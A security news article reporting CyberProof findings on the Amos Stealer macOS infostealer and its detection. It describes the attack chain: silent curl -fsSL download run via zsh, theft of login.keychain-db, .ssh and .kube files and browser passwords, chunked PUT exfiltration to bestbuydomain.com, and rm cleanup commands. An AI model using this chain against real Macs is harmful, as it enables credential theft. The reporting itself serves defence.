Amos Stealer Targets macOS Keychain Files and Browser Passwords

Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are, reportedly, actively using this malware family to run financially motivated campaigns by compromising macOS environments.

Although Amos Stealer is not new, in the latest campaign, the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.

Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

Researchers noted that the malware operators use a built-in macOS utility called curl to download the malicious files silently. During a recent incident investigation, a threat hunting query flagged an unusual curl command.

They noted that, while identifying the specific server address that cybercriminals were using to fetch the malicious script, as:

Further probing revealed that the hackers used specific command flags -fsSL to make the download completely invisible to the user. These flags stop error alerts, turn off download progress bars, and ensure the script runs quietly. Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.

“Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive information from compromised systems,” researchers explained in the blog post shared with Hackread.com.

Investigation also revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db, to access saved corporate login details. It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig.

To prepare the data for the hackers, the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder. This file is divided into 10 MB chunks by the script, and a unique session ID is generated for the upload by mixing the current timestamp with a random hexadecimal string from OpenSSL.

Amos Stealer then sends the data to the attacker-controlled server address (bestbuydomain.com) using an HTTP PUT request via curl. A notable aspect is that the system retries failed uploads up to eight times. After a successful upload, Amos Stealer runs the cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its presence.

This silent type of cyberattack allows threat actors to easily steal saved credentials, which can leave compromised corporate networks exposed to data breaches and financial theft. CyberProof recommends that companies enforce strict Gatekeeper policies and monitor endpoints for strange curl commands to block these threat actors.